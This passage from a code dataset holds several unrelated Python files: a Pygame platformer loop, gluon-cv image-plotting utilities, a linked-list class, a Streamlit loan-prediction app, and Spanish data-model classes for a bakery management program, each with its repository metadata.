Pygame\npygame.init()\n\n# ----- Gera tela principal\nwindow = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption(\"Carlo's Delta Escape\")\nclock = pygame.time.Clock()\nlevel = Level(level_map, window)\n\n# ============ Inicia Assets ===========\nassets['snail_death_sound'] = pygame.mixer.Sound('Assets/snail_sounds/CaracolDeath.mp3')\nassets['player_jump_sounds'] = [pygame.mixer.Sound('Assets/player_sounds/MacacoPulo1.mp3'), pygame.mixer.Sound('Assets/player_sounds/MacacoPulo2.mp3')]\nganhou = False\nplayer = level.player.sprite\nscore = player.score\nlore_count = 1\n\n# =========== Sons ============\npygame.mixer.music.load('assets/sounds/musiquinha-fundo.mp3')\npygame.mixer.music.set_volume(0.3)\nsnail_death_sound = assets['snail_death_sound']\nplayer_jump_sounds = assets['player_jump_sounds']\npygame.mixer.init() \n\n# ----- Inicia estruturas de dados\nINICIO = 0\nLORE = 1\nGAME = 2\nGAME_OVER = 3\nQUIT = 4\nWIN = 5\nCOMMANDS = 6\n\ngame = INICIO\n\n# Inicializando variáveis\n\n\n# ===== Loop principal =====\npygame.mixer.music.play(loops=-1)\n\nwhile game != QUIT:\n\n if game == INICIO or game == GAME_OVER or game == WIN or game == COMMANDS or game == LORE:\n # ----- Trata eventos\n for event in pygame.event.get():\n # ----- Verifica consequências\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_SPACE: \n if game == COMMANDS:\n game = INICIO\n\n if event.key == pygame.K_c:\n if game == INICIO:\n game = COMMANDS\n\n if event.key == pygame.K_x:\n if game == LORE:\n lore_count += 1\n if lore_count == 7:\n game = GAME\n\n if event.key == pygame.K_RETURN:\n if game == GAME_OVER:\n del level\n level = Level(level_map, window)\n score = 0\n game = GAME\n \n if game == WIN:\n del level\n level = Level(level_map, window)\n score = 0\n game = GAME\n\n if game == INICIO:\n game = LORE\n\n \n if event.type == pygame.QUIT:\n game = QUIT\n \n if game == INICIO: # se o jogo está na tela de inicio \n window.fill((0, 0, 0))\n window.blit(assets['tela de 
inicio'], (0, 0))\n \n elif game == LORE: # se o jogo está apresentando a cutscene \n window.fill((0, 0, 0))\n if lore_count == 1:\n window.blit(assets['lore1'], (0, 0))\n elif lore_count == 2:\n window.blit(assets['lore2'], (0, 0))\n elif lore_count == 3:\n window.blit(assets['lore3'], (0, 0))\n elif lore_count == 4:\n window.blit(assets['lore4'], (0, 0))\n elif lore_count == 5:\n window.blit(assets['lore5'], (0, 0))\n elif lore_count == 6:\n window.blit(assets['lore6'], (0, 0))\n\n elif game == GAME_OVER: # se o jogo está na tela de inicio (player perdeu) \n\n window.fill((0, 0, 0)) \n window.blit(assets['game over'], (0, 0))\n\n elif game == WIN: # se o jogo está na tela de vitória\n if score < 15000:\n window.fill((0, 0, 0))\n window.blit(assets['final ruim'], (0, 0))\n\n font = pygame.font.SysFont(None, 48)\n text = font.render('15.000', True, (255, 255, 255))\n text2 = font.render('{}'.format(score), True, (255, 255, 255))\n\n window.blit(text2, (100, 210))\n window.blit(text, (100, 320))\n else:\n window.fill((0, 0, 0))\n window.blit(assets['final bom'], (0, 0))\n\n elif game == COMMANDS: # se o jogo está na tela de comandos \n window.fill((0, 0, 0)) \n window.blit(assets['comandos'], (0, 0))\n \n elif game == GAME: # se o jogo está rodando\n \n player = level.player.sprite\n\n # ----- Trata eventos\n for event in pygame.event.get():\n # ----- Verifica consequências\n if event.type == pygame.QUIT:\n game = QUIT \n\n # ----- Jump Sound:\n if player.can_jump_sound:\n choice(assets['player_jump_sounds']).play()\n player.can_jump_sound = False\n \n # ----- Player Info\n if player.hp <= 0 :#or len(caiu) > 0:\n game = GAME_OVER\n level.destroy()\n score = 0\n continue\n\n # Recarrega Munição\n if len(player.banana_storage) < 3:\n recharge_hits = pygame.sprite.spritecollide(player, level.recharge, True)\n for hit in recharge_hits:\n if len(player.banana_storage) > 0:\n for b in player.banana_storage:\n player.banana_storage.sprites()[-1].kill()\n score += 1000\n x = 30\n for i in range(3):\n x += 30\n balas_restantes = Munition(x, 10)\n player.banana_storage.add(balas_restantes)\n player.groups[\"all_sprites\"].add(balas_restantes)\n\n # Verifica se o caracol foi atingido pela banana - caso sim, ambos são deletados \n hits = pygame.sprite.groupcollide(groups['all_bananas'], groups['all_tiles'] , True, False, pygame.sprite.collide_mask)\n\n # Verifica se a \"bala\" bateu no chão - se sim, ela é deletada\n hits = pygame.sprite.groupcollide(groups['all_bananas'], groups['all_snails'] , True, True, pygame.sprite.collide_mask)\n if len(hits) > 0:\n snail_death_sound.play()\n score += 2000\n \n # Verifica se o player chegou ao final do jogo (chegou no computador)\n chegou_final = pygame.sprite.spritecollide(player, level.totem, False, pygame.sprite.collide_mask)\n if len(chegou_final) > 0:\n ganhou = True\n \n # Tira ponto do player caso ele seja atingido \n if player.dmg_score:\n score -= 500\n player.dmg_score = False\n\n # printa Score\n font = pygame.font.SysFont(None, 48)\n score_text = font.render('{}'.format(score), True, (255, 255, 255))\n\n # ----- Gera saídas\n window.fill((0, 0, 0)) # Preenche com a cor branca\n window.blit(assets['background'], (0, 0))\n window.blit(score_text, (65,80))\n level.run()\n all_sprites.update() \n all_sprites.draw(window)\n\n if ganhou:\n game = WIN\n ganhou = False\n level.destroy()\n\n # ----- Atualiza estado do jogo\n pygame.display.update() # Mostra o novo frame para o jogador\n\n clock.tick(60) 
","repo_name":"antoniolma/PyGameDessoft","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":7369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71586153121","text":"\"\"\"Visualize image.\"\"\"\nimport numpy as np\ntry:\n import mxnet as mx\nexcept ImportError:\n mx = None\n\ndef plot_image(img, ax=None, reverse_rgb=False):\n \"\"\"Visualize image.\n\n Parameters\n ----------\n img : numpy.ndarray or mxnet.nd.NDArray\n Image with shape `H, W, 3`.\n ax : matplotlib axes, optional\n You can reuse previous axes if provided.\n reverse_rgb : bool, optional\n Reverse RGB<->BGR orders if `True`.\n\n Returns\n -------\n matplotlib axes\n The ploted axes.\n\n Examples\n --------\n\n from matplotlib import pyplot as plt\n ax = plot_image(img)\n plt.show()\n \"\"\"\n from matplotlib import pyplot as plt\n if ax is None:\n # create new axes\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n if mx is not None and isinstance(img, mx.nd.NDArray):\n img = img.asnumpy()\n img = img.copy()\n if reverse_rgb:\n img[:, :, (0, 1, 2)] = img[:, :, (2, 1, 0)]\n ax.imshow(img.astype(np.uint8))\n return ax\n\ndef cv_plot_image(img, scale=1, upperleft_txt=None, upperleft_txt_corner=(10, 100),\n left_txt_list=None, left_txt_corner=(10, 150),\n title_txt_list=None, title_txt_corner=(500, 50),\n canvas_name='demo'):\n \"\"\"Visualize image with OpenCV.\n\n Parameters\n ----------\n img : numpy.ndarray or mxnet.nd.NDArray\n Image with shape `H, W, 3`.\n scale : float\n The scaling factor of the output image\n upperleft_txt : str, optional, default is None\n If presents, will print the string at the upperleft corner\n upperleft_txt_corner : tuple, optional, default is (10, 100)\n The bottomleft corner of `upperleft_txt`\n left_txt_list : list of str, optional, default is None\n If presents, will print each string in the list close to the left\n left_txt_corner : tuple, optional, default is (10, 150)\n The bottomleft corner of `left_txt_list`\n title_txt_list : list of str, optional, default is None\n If presents, will print each string in the list close to the top\n title_txt_corner : tuple, optional, default is (500, 50)\n The bottomleft corner of `title_txt_list`\n canvas_name : str, optional, default is 'demo'\n The name of the canvas to plot the image\n\n Examples\n --------\n\n from matplotlib import pyplot as plt\n ax = plot_image(img)\n plt.show()\n \"\"\"\n from ..filesystem import try_import_cv2\n cv2 = try_import_cv2()\n\n if mx is not None and isinstance(img, mx.nd.NDArray):\n img = img.asnumpy()\n\n height, width, _ = img.shape\n img = cv2.resize(img, (int(width * scale), int(height * scale)))\n if upperleft_txt is not None:\n font = cv2.FONT_HERSHEY_SIMPLEX\n bottomLeftCornerOfText = upperleft_txt_corner\n fontScale = 1\n fontColor = (255, 255, 255)\n thickness = 3\n\n cv2.putText(img, upperleft_txt, bottomLeftCornerOfText,\n font, fontScale, fontColor, thickness)\n\n if left_txt_list is not None:\n starty = left_txt_corner[1]\n for txt in left_txt_list:\n font = cv2.FONT_HERSHEY_SIMPLEX\n bottomLeftCornerOfText = (left_txt_corner[0], starty)\n fontScale = 1\n fontColor = (255, 255, 255)\n thickness = 1\n\n cv2.putText(img, txt, bottomLeftCornerOfText,\n font, fontScale, fontColor, thickness)\n\n starty += 30\n\n if title_txt_list is not None:\n font = cv2.FONT_HERSHEY_SIMPLEX\n bottomLeftCornerOfText = title_txt_corner\n fontScale = 1\n fontColor = (255, 255, 255)\n thickness = 3\n\n for txt in title_txt_list:\n 
cv2.putText(img, txt, bottomLeftCornerOfText,\n font, fontScale, fontColor, thickness)\n bottomLeftCornerOfText = (bottomLeftCornerOfText[0] + 100,\n bottomLeftCornerOfText[1] + 50)\n\n canvas = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n cv2.imshow(canvas_name, canvas)\n","repo_name":"dmlc/gluon-cv","sub_path":"gluoncv/utils/viz/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":4059,"program_lang":"python","lang":"en","doc_type":"code","stars":5662,"dataset":"github-code","pt":"54"} +{"seq_id":"25520281503","text":"from pyds.node import ListNode, DoubleListNode\n\n\nclass LinkedList:\n\n def __init__(self, x):\n self._head = ListNode(data=x)\n self._len = 1\n\n def __getitem__(self, item):\n if item == \"head\":\n return self._head\n\n def __str__(self):\n temp = self._head\n x = str(temp[\"data\"])+\" \"\n while temp[\"next\"] is not None:\n temp = temp[\"next\"]\n x += str(temp[\"data\"])+\" \"\n return x\n\n def append(self, x):\n curr = self._head\n while curr[\"next\"] is not None:\n curr = curr[\"next\"]\n curr[\"next\"] = ListNode(data=x)\n self._len += 1\n\n def extend(self, x):\n curr = self._head\n while curr[\"next\"] is not None:\n curr = curr[\"next\"]\n for i in x:\n curr[\"next\"] = ListNode(data=i)\n curr = curr[\"next\"]\n self._len += 1\n\n def insert(self, x, pos):\n if pos > self._len:\n raise RuntimeError(f\"Unable to insert {x} at {pos} as length of the list object at 0x{id(self)} is {self._len}\")\n if pos == 0:\n new = ListNode(data=x, next_=self._head)\n self._head = new\n self._len += 1\n elif pos == self._len:\n self.append(x)\n else:\n curr = self._head\n count = 0\n while count < pos-1 and curr[\"next\"] is not None:\n curr = curr[\"next\"]\n count += 1\n new = ListNode(data=x, next_=curr[\"next\"])\n curr[\"next\"] = new\n self._len += 1\n\n def delete(self, x):\n curr = self._head\n if curr[\"data\"] == x:\n self._head = curr[\"next\"]\n curr[\"next\"] = None\n return\n while curr[\"next\"][\"data\"] != x and curr[\"next\"] is not None:\n curr = curr[\"next\"]\n if curr[\"next\"] is None:\n return -1\n else:\n temp = curr[\"next\"]\n curr[\"next\"] = temp[\"next\"]\n temp[\"next\"] = None\n return 1\n\n def mid(self):\n slow = self._head\n fast = self._head\n while fast is not None and fast[\"next\"] is not None:\n slow = slow[\"next\"]\n fast = fast[\"next\"][\"next\"]\n return slow[\"data\"]\n\n\nclass DoublyLinkedList:\n def __init__(self, x):\n self._head = DoubleListNode(data=x)\n","repo_name":"Raagulbharatwaj/pyds-0.1.0","sub_path":"pyds/llist.py","file_name":"llist.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74492399522","text":"import joblib\nimport streamlit as st\nimport numpy as np\nimport wget\n\nmodel_name = 'RF_Loan_model.joblib'\nfile_url = \"https://raw.githubusercontent.com/manifoldailearning/Complete-MLOps-BootCamp/main/Build-ML-App-Streamlit/RF_Loan_model.joblib\"\nwget.download(file_url)\nmodel = joblib.load(model_name)\n\ndef prediction(Gender,Married,Dependents,\n Education,Self_Employed,ApplicantIncome,CoapplicantIncome,\n LoanAmount,Loan_Amount_Term,Credit_History,Property_Area):\n if Gender == \"Male\":\n Gender = 1\n else:\n Gender = 0\n\n if Married == \"Yes\":\n Married = 1\n else:\n Married = 0\n\n if Education == \"Graduate\":\n Education = 0\n else:\n Education = 1\n \n if Self_Employed == \"Yes\":\n Self_Employed = 1\n else:\n Self_Employed = 0\n\n if Credit_History == \"Outstanding Loan\":\n 
Credit_History = 1\n else:\n Credit_History = 0 \n \n if Property_Area == \"Rural\":\n Property_Area = 0\n elif Property_Area == \"Semi Urban\":\n Property_Area = 1 \n else:\n Property_Area = 2 \n Total_Income = np.log(ApplicantIncome + CoapplicantIncome)\n\n prediction = model.predict([[Gender, Married, Dependents, Education, Self_Employed,LoanAmount, Loan_Amount_Term, Credit_History, Property_Area,Total_Income]])\n print(print(prediction))\n\n if prediction==0:\n pred = \"Rejected\"\n\n else:\n pred = \"Approved\"\n return pred \n\n\ndef main():\n # Front end\n st.title(\"Welcome to Loan Application\")\n st.header(\"Please enter your details to proceed with your loan Application\")\n Gender = st.selectbox(\"Gender\",(\"Male\",\"Female\"))\n Married = st.selectbox(\"Married\",(\"Yes\",\"No\"))\n Dependents = st.number_input(\"Number of Dependents\")\n Education = st.selectbox(\"Education\",(\"Graduate\",\"Not Graduate\"))\n Self_Employed = st.selectbox(\"Self Employed\",(\"Yes\",\"No\"))\n ApplicantIncome = st.number_input(\"Applicant Income\")\n CoapplicantIncome = st.number_input(\"Coapplicant Income\")\n LoanAmount = st.number_input(\"LoanAmount\")\n Loan_Amount_Term = st.number_input(\"Loan Amount Term\")\n Credit_History = st.selectbox(\"Credit History\",(\"Outstanding Loan\", \"No Outstanding Loan\"))\n Property_Area = st.selectbox(\"Property Area\",(\"Rural\",\"Urban\",\"Semi Urban\"))\n\n if st.button(\"Predict\"):\n result = prediction(Gender,Married,Dependents,\n Education,Self_Employed,ApplicantIncome,CoapplicantIncome,\n LoanAmount,Loan_Amount_Term,Credit_History,Property_Area)\n \n if result == \"Approved\":\n st.success(\"Your loan Application is Approved\")\n else:\n st.error(\"Your loan Application is Rejected\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"manifoldailearning/Complete-MLOps-BootCamp","sub_path":"Build-ML-App-Streamlit/streamlit-ml-app.py","file_name":"streamlit-ml-app.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32572466200","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nCreated on 14/03/2015\n\n@author: jorgesaw\n'''\n\nfrom __future__ import absolute_import, unicode_literals, print_function\nimport PyQt4.QtCore as _qc\nfrom imperial.core.util.cadenas import printable\nimport datetime\n\n#uDatos que sirven para diferenciarlos al editar los precios de ambos.\nPRECIO_PRODUCTO, PRECIO_INGREDIENTE = range(2) \n#NAME, CODE, EXT_CODE, PRICE, BUY_PRICE, STOCK, PACK_UNITS, CATEGORY, \\\n#MIN_STOCK, IDEAL_STOCK, DESCRIPTION = range(11)\nNAME, PRICE, DESCRIPTION, CATEGORIA_PROD, PRECIO_NUEVO, POS_PRECIO = range(6)\nclass Product(object):\n \"\"\"\n \"\"\"\n name = \"\"\n #precio = 0.0\n categoria = 1\n #Constants for type of product, it defines the tax it to be charged (depends on other crappy stuff)\n descripcion = \"\"\n\n def __init__(self, name=\"\", precio=0.0, categoria=1):\n self.setName(name)\n self.precio = precio\n self.categoria = categoria\n self.activo = True\n \n def __cmp__(self, other):\n return _qc.QString.localeAwareCompare(self.name.lower(),\n other.name.lower())\n \n def precioActivo(self, fecha_precio=datetime.date.today()):\n #lstPrecios = set()\n \n fecha_precio_activo = datetime.date(1982, 1, 27)\n precio_activo = None\n \n for precio_guardado in self.colPrecioProd:\n #if self.id == 4:\n # print('FECHA:', precio_guardado.fecha_ingreso, ' | PRECIO:', precio_guardado.precio)\n if precio_guardado.fecha_ingreso 
<= fecha_precio:\n #lstPrecios.add(precio_guardado)\n if precio_guardado.fecha_ingreso > fecha_precio_activo:\n precio_activo = precio_guardado\n fecha_precio_activo = precio_guardado.fecha_ingreso\n \n #if len(lstPrecios) > 0: \n # self.precio = max(lstPrecios).precio\n #print('Hay Precio!!!')\n #else: \n # self.precio = 0.0\n #self.precio = min(self.colPrecioProd).precio\n #print(self.precio)\n \n if precio_activo:\n self.precio = precio_activo.precio\n else:\n self.precio = 0.0\n \n #if self.id == 4:\n # print('El precio activo a la fecha de hot es:', self.precio)\n \n return self.precio\n \n def __str__(self):\n #return \"[{0}] ${1:.2f} {2}\".format(self.code, self.price, self.name)\n return \"{}\".format(self.name)\n\n def setName(self, name):\n self.name = printable(name)\n \n @staticmethod\n def data2Object(lstDatos):\n prod = Product(lstDatos[NAME], lstDatos[PRICE], lstDatos[CATEGORIA_PROD])\n prod.description = lstDatos[DESCRIPTION]\n \n precioProd = PrecioProd(lstDatos[PRICE], datetime.date.today())\n \n prod.colPrecioProd.append(precioProd)\n \n return prod\n\n @staticmethod\n def object2Data(prod):\n precio = 0.0\n if len(prod.colPrecioProd) > 0:\n precio = prod.colPrecioProd[len(prod.colPrecioProd) - 1].precio\n return [prod.name, precio, \n prod.description, prod.categoria] \n \n @staticmethod\n def editObject(prod, lstDatos):\n prod.name = lstDatos[NAME] \n prod.price = lstDatos[PRICE]\n prod.description = lstDatos[DESCRIPTION]\n prod.categoria = lstDatos[CATEGORIA_PROD]\n \n if lstDatos[PRECIO_NUEVO]:#uSi el precio es nuevo.\n #uCreo un nuevo precio\n precioProd = PrecioProd(lstDatos[PRICE], datetime.date.today())\n prod.colPrecioProd.append(precioProd)\n else:\n #uActualizo el precio\n prod.colPrecioProd[lstDatos[POS_PRECIO]].precio = lstDatos[PRICE]\n \n @staticmethod\n def type():\n return Product\n \nPRECIO_PROD, FECHA_INGRESO_PROD = range(2)\nclass PrecioProd(object):\n u\"\"\"Clase que representa el precio de un producto.\"\"\"\n \n def __init__(self, precio, fecha_ingreso):\n self.precio = precio\n self.fecha_ingreso = fecha_ingreso\n \n def __str__(self):\n return '{}-{}'.format(self.precio, self.fecha_ingreso)\n \n @staticmethod\n def data2Object(lstDatos):\n precioProd = PrecioProd(lstDatos[PRECIO_PROD, FECHA_INGRESO_PROD])\n return precioProd\n \n @staticmethod\n def object2Data(precioProd):\n return [precioProd.ingrediente, precioProd.cant]\n \n @staticmethod\n def editObject(precioProd, lstDatos):\n precioProd.precio = lstDatos[PRECIO_PROD]\n precioProd.fecha_ingreso = lstDatos[FECHA_INGRESO_PROD]\n \n @staticmethod\n def type():\n return PrecioProd \n \nNAME_CATEGORIA, = range(1)\nclass Category(object):\n VARIOS = 1\n PAN = 2\n \n lstRubros = [u'VARIOS', u'PAN']\n \n name = \"\"\n def __init__(self, name=\"\"):\n self.name = name\n \n def __str__(self):\n return '{}'.format(self.name)\n \n @staticmethod\n def data2Object(lstDatos):\n category = Category(lstDatos[NAME])\n return category\n \n @staticmethod\n def object2Data(category):\n return [category.name]\n \n @staticmethod\n def editObject(category, lstDatos):\n category.name = lstDatos[NAME]\n \n @staticmethod\n def type():\n return Category\n\nNAME_PROV, EMAIL_PROV, DIRECCION_PROV, BARRIO_PROV, CIUDAD_PROV, \\\nTELEFONO_PROV, CELULAR_PROV, ALTURA_PROV, PISO_PROV, DEPTO_PROV, PROVINCIA_PROV, \\\nFECHA_ALTA_PROV, VENDEDOR_PROV = range(13)\nclass Proveedor(object):\n \"\"\"Proveedor\n \"\"\"\n nombre = \"\"\n direccion = None\n tel = \"\"\n cel = \"\"\n fecha_alta = None\n \n def __init__(self, nombre, 
telefono=None, celular=None, email=None):\n self.nombre = nombre\n self.telefono = telefono\n self.celular = celular\n self.email = email\n self.fecha_alta = datetime.date.today()\n \n def __cmp__(self, other):\n return _qc.QString.localeAwareCompare(self.nombre.lower(),\n other.nombre.lower())\n \n @staticmethod\n def data2Object(lstDatos):\n #lstDatos = lstDatosProv[0]\n #lstDatosVendedor = lstDatosProv[1]\n \n prov = Proveedor(lstDatos[NAME_PROV], lstDatos[TELEFONO_PROV], \n lstDatos[CELULAR_PROV], lstDatos[EMAIL_PROV])\n #if lstDatos[FECHA_ALTA]:\n # prov.fecha_alta = lstDatos[FECHA_ALTA]\n \n direccion = Direccion(calle=lstDatos[DIRECCION_PROV],\n altura=lstDatos[ALTURA_PROV], \n barrio=lstDatos[BARRIO_PROV]\n )\n \n if lstDatos[PISO]:\n direccion.piso = lstDatos[PISO_PROV]\n direccion.depto = lstDatos[DEPTO_PROV]\n \n prov.direccion = direccion\n prov.ciudad = lstDatos[CIUDAD_PROV]\n \n if lstDatos[VENDEDOR_PROV]:\n prov.vendedorProv = lstDatos[VENDEDOR_PROV]\n #uCargo el vendedor/contacto\n #prov.vendedorProv = VendedorProv.data2Object(lstDatosVendedor)\n \n return prov\n \n @staticmethod\n def object2Data(prov):\n lstDatosProv = [prov.nombre, prov.email, prov.direccion.calle, \n prov.direccion.barrio, prov.ciudad, \n prov.telefono, prov.celular, \n prov.direccion.altura, prov.direccion.piso,\n prov.direccion.depto, prov.ciudad.provincia, \n prov.fecha_alta, prov.vendedorProv]\n \n #lstDatosVendedorProv = VendedorProv.object2Data(prov.vendedorProv)\n \n return lstDatosProv#[lstDatosProv, lstDatosVendedorProv]\n \n @staticmethod\n def editObject(prov, lstDatos):\n #lstDatosVendedor = lstDatosProv[1]\n \n prov.nombre = lstDatos[NAME]\n\n direccion = Direccion(calle=lstDatos[DIRECCION_PROV],\n altura=lstDatos[ALTURA_PROV], \n barrio=lstDatos[BARRIO_PROV]\n )\n if lstDatos[PISO]:\n direccion.piso = lstDatos[PISO_PROV]\n direccion.depto = lstDatos[DEPTO_PROV]\n \n prov.direccion = direccion\n prov.ciudad = lstDatos[CIUDAD_PROV]\n prov.telefono = lstDatos[TELEFONO_PROV]\n prov.celular = lstDatos[CELULAR_PROV]\n prov.email = lstDatos[EMAIL_PROV]\n \n if lstDatos[VENDEDOR_PROV]:\n prov.vendedorProv = lstDatos[VENDEDOR_PROV]\n #VendedorProv.editObject(prov.vendedorProv, lstDatosVendedor)\n \n @staticmethod\n def type():\n return Proveedor\n\n\nNAME_VEND_PROV, EMAIL_VEND_PROV, DIRECCION_VEND_PROV, BARRIO_VEND_PROV, CIUDAD_VEND_PROV, \\\nTELEFONO_VEND_PROV, CELULAR_VEND_PROV, ALTURA_VEND_PROV, \\\nPISO_VEND_PROV, DEPTO_VEND_PROV, PROVINCIA_VEND_PROV, \\\nFECHA_ALTA_VEND_PROV, PROVEEDOR_VEND = range(13)\nclass VendedorProv(object):\n \n \"\"\"VendedorProv\n \"\"\"\n nombre = \"\"\n direccion = None\n tel = \"\"\n cel = \"\"\n fecha_alta = None\n \n def __init__(self, nombre, telefono=None, celular=None, email=None):\n self.nombre = nombre\n self.telefono = telefono\n self.celular = celular\n self.email = email\n self.fecha_alta = datetime.date.today()\n \n def __cmp__(self, other):\n return _qc.QString.localeAwareCompare(self.nombre.lower(),\n other.nombre.lower())\n \n @staticmethod\n def data2Object(lstDatos):\n prov = VendedorProv(lstDatos[NAME_PROV], lstDatos[TELEFONO_PROV], \n lstDatos[CELULAR_PROV], lstDatos[EMAIL_PROV])\n #if lstDatos[FECHA_ALTA]:\n # prov.fecha_alta = lstDatos[FECHA_ALTA]\n \n direccion = Direccion(calle=lstDatos[DIRECCION_PROV],\n altura=lstDatos[ALTURA_PROV], \n barrio=lstDatos[BARRIO_PROV]\n )\n \n if lstDatos[PISO]:\n direccion.piso = lstDatos[PISO_PROV]\n direccion.depto = lstDatos[DEPTO_PROV]\n \n prov.direccion = direccion\n prov.ciudad = lstDatos[CIUDAD_PROV]\n 
\n return prov\n \n @staticmethod\n def object2Data(prov):\n return [prov.nombre, prov.email, prov.direccion.calle, \n prov.direccion.barrio, prov.ciudad, \n prov.telefono, prov.celular, \n prov.direccion.altura, prov.direccion.piso,\n prov.direccion.depto, prov.ciudad.provincia, \n prov.fecha_alta, prov.proveedor]\n \n @staticmethod\n def editObject(prov, lstDatos):\n prov.nombre = lstDatos[NAME]\n\n direccion = Direccion(calle=lstDatos[DIRECCION_PROV],\n altura=lstDatos[ALTURA_PROV], \n barrio=lstDatos[BARRIO_PROV]\n )\n if lstDatos[PISO]:\n direccion.piso = lstDatos[PISO_PROV]\n direccion.depto = lstDatos[DEPTO_PROV]\n \n prov.direccion = direccion\n prov.ciudad = lstDatos[CIUDAD_PROV]\n prov.telefono = lstDatos[TELEFONO_PROV]\n prov.celular = lstDatos[CELULAR_PROV]\n prov.email = lstDatos[EMAIL_PROV]\n \n @staticmethod\n def type():\n return VendedorProv\n \n\nNAME_PROV, = range(1)\nclass Provincia(object):\n u\"\"\"Clase que representa una provincia.\"\"\"\n\n def __init__(self, nombre):\n self.nombre = nombre\n\n def __str__(self):\n return '{}'.format(self.nombre)\n \n @staticmethod\n def data2Object(lstDatos):\n prov = Proveedor(lstDatos[NAME])\n return prov\n \n @staticmethod\n def object2Data(prov):\n return [prov.name, ]\n \n @staticmethod\n def editObject(prov, lstDatos):\n prov.nombre = lstDatos[NAME_PROV]\n \n @staticmethod\n def type():\n return Provincia\n \nNAME_CIUDAD, COD_POSTAL, DDN = range(3) \nclass Ciudad(object):\n u\"\"\"Clase que representa una ciudad.\"\"\"\n\n def __init__(self, nomCiudad, codPostal, DDN):\n self.nomCiudad = nomCiudad\n self.codPostal = codPostal\n self.DDN = DDN\n\n def __str__(self):\n return u'{0}'.format(self.nomCiudad)\n \n @staticmethod\n def data2Object(lstDatos):\n ciudad = Ciudad(lstDatos[NAME_CIUDAD], lstDatos[COD_POSTAL], \n lstDatos[DDN])\n return ciudad\n \n @staticmethod\n def object2Data(ciudad):\n return [ciudad.nomCiudad, ciudad.codPostal, ciudad.DDN]\n \n @staticmethod\n def editObject(ciudad, lstDatos):\n ciudad.nomCiudad = lstDatos[NAME_CIUDAD]\n ciudad.codPostal = lstDatos[COD_POSTAL]\n ciudad.DDN = lstDatos[DDN]\n \n @staticmethod\n def type():\n return Ciudad\n\nCALLE, ALTURA, PISO, DEPTO, BARRIO = range(5) \nclass Direccion(object):\n u\"\"\"Clase que representa una dirección física.\"\"\"\n\n def __init__(self, calle, altura, piso=None, depto=None, barrio=None):\n self.calle = calle\n self.altura = altura\n self.piso = piso\n self.depto = depto\n self.barrio = barrio\n\n def __str__(self):\n return '{0} {1}'.format(self.calle, self.altura)\n \n @staticmethod\n def data2Object(lstDatos):\n direc = Direccion(lstDatos[CALLE], lstDatos[ALTURA], lstDatos[PISO], \n lstDatos[DEPTO], lstDatos[BARRIO])\n return direc\n \n @staticmethod\n def object2Data(direc):\n return [direc.calle, direc.altura, direc.piso, \n direc.depto, direc.barrio]\n \n @staticmethod\n def editObject(direc, lstDatos):\n direc.calle = lstDatos[CALLE]\n direc.altura = lstDatos[ALTURA]\n direc.piso = lstDatos[PISO]\n direc.depto = lstDatos[DEPTO]\n direc.barrio = lstDatos[BARRIO]\n \n @staticmethod\n def type():\n return Direccion\n \nNOMBRE_EGRESO, = range(1)\nclass Egreso(object): \n u\"\"\"Egreso\n \"\"\" \n def __init__(self, nombre):\n self.nombre = nombre\n \n def __str__(self):\n return '{}'.format(self.nombre)\n \n def __cmp__(self, other):\n return _qc.QString.localeAwareCompare(self.nombre.lower(),\n other.nombre.lower())\n \n @staticmethod\n def data2Object(lstDatos):\n egreso = Egreso(lstDatos[NOMBRE_EGRESO])\n return egreso\n \n @staticmethod\n 
def object2Data(egreso):\n return [egreso.nombre, ]\n \n @staticmethod\n def editObject(egreso, lstDatos):\n egreso.nombre = lstDatos[NOMBRE_EGRESO]\n \n @staticmethod\n def type():\n return Egreso\n \nVALOR_EGRESO, NOM_EGRESO, FECHA_EGRESO = range(3)\nclass MovEgreso(object):\n \"\"\"Clase que representa el movimiento diario de egresos.\"\"\"\n \n total = 0.0\n \n def __init__(self, saldo_parcial, egreso, fecha):\n self.saldo_parcial = saldo_parcial\n self.egreso = egreso\n self.fecha = fecha\n self.total = 0.0\n \n def setSaldoParcial(self, saldo_parcial):\n self.saldo_parcial = saldo_parcial\n \n def calcularSubtotal(self):\n return self.saldo_parcial\n \n def calcularTotal(self):\n self.total = 0.0\n self.total += self.saldo_parcial\n \n return self.total\n \n def __str__(self):\n return '{}'.format(self.egreso.nombre)\n \n @staticmethod\n def data2Object(lstDatos):\n mov_egreso = MovEgreso(lstDatos[VALOR_EGRESO], lstDatos[NOM_EGRESO], \n lstDatos[FECHA_EGRESO])\n return mov_egreso\n \n @staticmethod\n def object2Data(mov_egreso):\n return [mov_egreso.valor, mov_egreso.egreso, mov_egreso.fecha]\n \n @staticmethod\n def editObject(mov_egreso, lstDatos):\n mov_egreso.valor = lstDatos[VALOR_EGRESO]\n mov_egreso.egreso = lstDatos[NOM_EGRESO]\n mov_egreso.fecha = lstDatos[FECHA_EGRESO]\n @staticmethod\n def type():\n return MovEgreso\n \nNOMBRE_VEND, ES_VENDEDOR = range(2)\nclass Vendedor(object):\n u\"\"\"Vendedor\n \"\"\"\n TIPO = 'vendedor'\n \n def __init__(self, nombre):\n self.nombre = nombre\n self.tipo = Vendedor.TIPO\n \n def __str__(self):\n return '{}'.format(self.nombre)\n \n def __cmp__(self, other):\n return _qc.QString.localeAwareCompare(self.nombre.lower(),\n other.nombre.lower())\n \n @staticmethod\n def data2Object(lstDatos):\n vend = None\n if lstDatos[ES_VENDEDOR]:\n vend = VendedorExterno(lstDatos[NOMBRE_VEND])\n else:\n vend = VendedorInterno(lstDatos[NOMBRE_VEND])\n return vend\n \n @staticmethod\n def object2Data(vend):\n is_vendedor = False\n if isinstance(vend, VendedorExterno):\n is_vendedor = True\n \n return [vend.nombre, is_vendedor]\n \n @staticmethod\n def editObject(vend, lstDatos):\n vend.nombre = lstDatos[NOMBRE_VEND]\n 